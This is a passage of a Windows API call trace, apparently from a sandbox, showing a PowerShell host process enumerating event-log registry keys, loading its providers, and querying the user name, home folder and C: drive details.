	[0340.759] CoTaskMemFree (pv=0x114ad0) 
	[0340.759] CoTaskMemFree (pv=0x0) 
	[0340.759] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.759] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.759] CoTaskMemFree (pv=0x114ad0) 
	[0340.759] CoTaskMemFree (pv=0x0) 
	[0340.759] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.759] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.759] CoTaskMemFree (pv=0x114ad0) 
	[0340.759] CoTaskMemFree (pv=0x0) 
	[0340.759] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.759] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.759] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.760] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.760] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.760] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.760] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.760] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.760] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.760] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.760] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0340.760] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x114ad0, lpcchName=0x26d058, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d058, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0340.760] CoTaskMemFree (pv=0x114ad0) 
	[0340.760] CoTaskMemFree (pv=0x0) 
	[0340.760] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x304) returned 0x0
	[0340.761] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.761] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x360) returned 0x0
	[0340.761] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.761] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x364) returned 0x0
	[0340.761] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.761] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x368) returned 0x0
	[0340.761] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.761] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x36c) returned 0x0
	[0340.761] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.761] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x370) returned 0x0
	[0340.762] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.762] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x374) returned 0x0
	[0340.762] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.762] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x378) returned 0x0
	[0340.762] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x0) returned 0x2
	[0340.762] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x37c) returned 0x0
	[0340.762] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0b8 | out: phkResult=0x26d0b8*=0x380) returned 0x0
	[0340.762] RegCloseKey (hKey=0x380) returned 0x0
	[0340.762] RegCloseKey (hKey=0x35c) returned 0x0
	[0340.763] RegCloseKey (hKey=0x37c) returned 0x0
	[0340.768] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9e0008
	[0341.336] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea0418*="WSMan", lpRawData=0x2ea0188) returned 1
	[0341.337] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.337] CoTaskMemFree (pv=0x100100) 
	[0341.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.340] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0341.340] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0341.340] CoTaskMemFree (pv=0x1b91a6c0) 
	[0341.340] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0341.340] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0341.340] CoTaskMemFree (pv=0x114ad0) 
	[0341.341] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ea5df8*="Alias", lpRawData=0x2ea5b88) returned 1
	[0341.342] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.342] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.342] CoTaskMemFree (pv=0x100100) 
	[0341.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.344] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0341.344] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0341.345] CoTaskMemFree (pv=0x1b91a6c0) 
	[0341.345] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0341.345] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0341.345] CoTaskMemFree (pv=0x114ad0) 
	[0341.346] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eab3f0*="Environment", lpRawData=0x2eab180) returned 1
	[0341.347] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.347] CoTaskMemFree (pv=0x100100) 
	[0341.348] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.348] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0341.348] CoTaskMemFree (pv=0x100100) 
	[0341.348] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.348] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0341.348] CoTaskMemFree (pv=0x100100) 
	[0341.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0341.349] SetErrorMode (uMode=0x1) returned 0x1
	[0341.349] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x26d100 | out: lpFileInformation=0x26d100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0341.349] SetErrorMode (uMode=0x1) returned 0x1
	[0341.350] GetLogicalDrives () returned 0x4
	[0341.351] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cc60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.351] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0341.351] SetErrorMode (uMode=0x1) returned 0x1
	[0341.352] CoTaskMemAlloc (cb=0x68) returned 0x1b8ff5e0
	[0341.352] CoTaskMemAlloc (cb=0x68) returned 0x1b8ff180
	[0341.352] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b8ff5e0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x26d0d0, lpMaximumComponentLength=0x26d0cc, lpFileSystemFlags=0x26d0c8, lpFileSystemNameBuffer=0x1b8ff180, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26d0d0*=0x9c354b42, lpMaximumComponentLength=0x26d0cc*=0xff, lpFileSystemFlags=0x26d0c8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0341.352] CoTaskMemFree (pv=0x1b8ff5e0) 
	[0341.352] CoTaskMemFree (pv=0x1b8ff180) 
	[0341.352] SetErrorMode (uMode=0x1) returned 0x1
	[0341.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0341.353] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.353] SetErrorMode (uMode=0x1) returned 0x1
	[0341.353] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26d070 | out: lpFileInformation=0x26d070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0341.353] SetErrorMode (uMode=0x1) returned 0x1
	[0341.353] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26ce10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.353] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0341.354] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x26cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.354] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0341.354] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.354] SetErrorMode (uMode=0x1) returned 0x1
	[0341.354] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0341.354] SetErrorMode (uMode=0x1) returned 0x1
	[0341.355] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cc40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.355] SetErrorMode (uMode=0x1) returned 0x1
	[0341.355] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cea0 | out: lpFileInformation=0x26cea0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0341.355] SetErrorMode (uMode=0x1) returned 0x1
	[0341.355] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x26cce0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0341.355] SetErrorMode (uMode=0x1) returned 0x1
	[0341.355] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x26cf40 | out: lpFileInformation=0x26cf40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0341.355] SetErrorMode (uMode=0x1) returned 0x1
	[0341.356] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0341.356] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0341.356] CoTaskMemFree (pv=0x1b91a6c0) 
	[0341.356] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0341.356] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0341.357] CoTaskMemFree (pv=0x114ad0) 
	[0341.357] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb24e0*="FileSystem", lpRawData=0x2eb2270) returned 1
	[0341.357] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.358] CoTaskMemFree (pv=0x100100) 
	[0341.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.358] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0341.358] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0341.359] CoTaskMemFree (pv=0x1b91a6c0) 
	[0341.359] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0341.359] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0341.359] CoTaskMemFree (pv=0x114ad0) 
	[0341.359] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eb7d20*="Function", lpRawData=0x2eb7ab0) returned 1
	[0341.360] CoTaskMemAlloc (cb=0x104) returned 0x100100
	[0341.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0341.360] CoTaskMemFree (pv=0x100100) 
	[0341.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0341.746] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0341.747] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0342.065] CoTaskMemFree (pv=0x1b91a6c0) 
	[0342.065] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0342.065] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0342.066] CoTaskMemFree (pv=0x114ad0) 
	[0342.066] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2eea0f8*="Registry", lpRawData=0x2ee9e88) returned 1
	[0342.519] CoTaskMemAlloc (cb=0x804) returned 0x1b91a6c0
	[0342.519] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b91a6c0, nSize=0x26d348 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d348) returned 0x1
	[0342.519] CoTaskMemFree (pv=0x1b91a6c0) 
	[0342.519] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0342.519] GetUserNameW (in: lpBuffer=0x114ad0, pcbBuffer=0x26d388 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d388) returned 1
	[0342.519] CoTaskMemFree (pv=0x114ad0) 
